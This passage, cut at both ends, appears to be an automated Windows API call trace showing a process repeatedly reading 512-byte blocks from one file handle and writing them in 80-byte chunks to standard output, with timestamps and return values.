_get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] GetFileType (hFile=0x50) returned 0x1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, 
lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] GetFileType (hFile=0x50) returned 0x1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] GetFileType (hFile=0x50) returned 0x1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] GetFileType (hFile=0x50) returned 0x1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] GetFileType (hFile=0x50) returned 0x1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] GetFileType (hFile=0x50) returned 0x1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: 
lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.280] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.280] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.281] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.281] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] GetFileType (hFile=0x50) returned 0x1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] GetFileType (hFile=0x50) returned 0x1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] GetFileType (hFile=0x50) returned 0x1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] GetFileType (hFile=0x50) returned 0x1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] GetFileType (hFile=0x50) returned 0x1 [0151.281] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0151.281] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] GetFileType (hFile=0x50) returned 0x1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] GetFileType (hFile=0x50) returned 0x1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] GetFileType (hFile=0x50) returned 0x1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.282] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.282] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.282] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.282] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] 
GetFileType (hFile=0x50) returned 0x1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] GetFileType (hFile=0x50) returned 0x1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] GetFileType (hFile=0x50) returned 0x1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] GetFileType (hFile=0x50) returned 0x1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] GetFileType (hFile=0x50) returned 0x1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] GetFileType (hFile=0x50) returned 0x1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 
[0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] GetFileType (hFile=0x50) returned 0x1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] GetFileType (hFile=0x50) returned 0x1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.283] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.283] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.284] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.284] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] GetFileType (hFile=0x50) returned 0x1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] GetFileType (hFile=0x50) returned 0x1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] GetFileType (hFile=0x50) returned 0x1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] GetFileType (hFile=0x50) returned 0x1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] GetFileType (hFile=0x50) returned 0x1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] GetFileType (hFile=0x50) returned 0x1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] GetFileType (hFile=0x50) returned 0x1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] GetFileType (hFile=0x50) returned 0x1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.285] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.285] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.285] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.285] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] GetFileType (hFile=0x50) returned 0x1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] GetFileType (hFile=0x50) returned 0x1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] GetFileType (hFile=0x50) returned 0x1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] GetFileType (hFile=0x50) returned 0x1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] GetFileType 
(hFile=0x50) returned 0x1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] GetFileType (hFile=0x50) returned 0x1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] GetFileType (hFile=0x50) returned 0x1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] GetFileType (hFile=0x50) returned 0x1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.287] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.287] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.287] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.287] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.287] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] GetFileType (hFile=0x50) returned 0x1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] GetFileType (hFile=0x50) returned 0x1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] GetFileType (hFile=0x50) returned 0x1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] GetFileType (hFile=0x50) returned 0x1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] GetFileType (hFile=0x50) returned 0x1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] GetFileType (hFile=0x50) returned 0x1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, 
lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] GetFileType (hFile=0x50) returned 0x1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] GetFileType (hFile=0x50) returned 0x1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.288] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.288] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] GetFileType (hFile=0x50) returned 0x1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] GetFileType (hFile=0x50) returned 0x1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] GetFileType (hFile=0x50) returned 0x1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 
[0151.288] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] GetFileType (hFile=0x50) returned 0x1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] GetFileType (hFile=0x50) returned 0x1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] GetFileType (hFile=0x50) returned 0x1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] GetFileType (hFile=0x50) returned 0x1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] GetFileType (hFile=0x50) returned 0x1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] WriteFile (in: hFile=0x50, 
lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.289] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.289] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.289] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.289] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.290] _get_osfhandle 
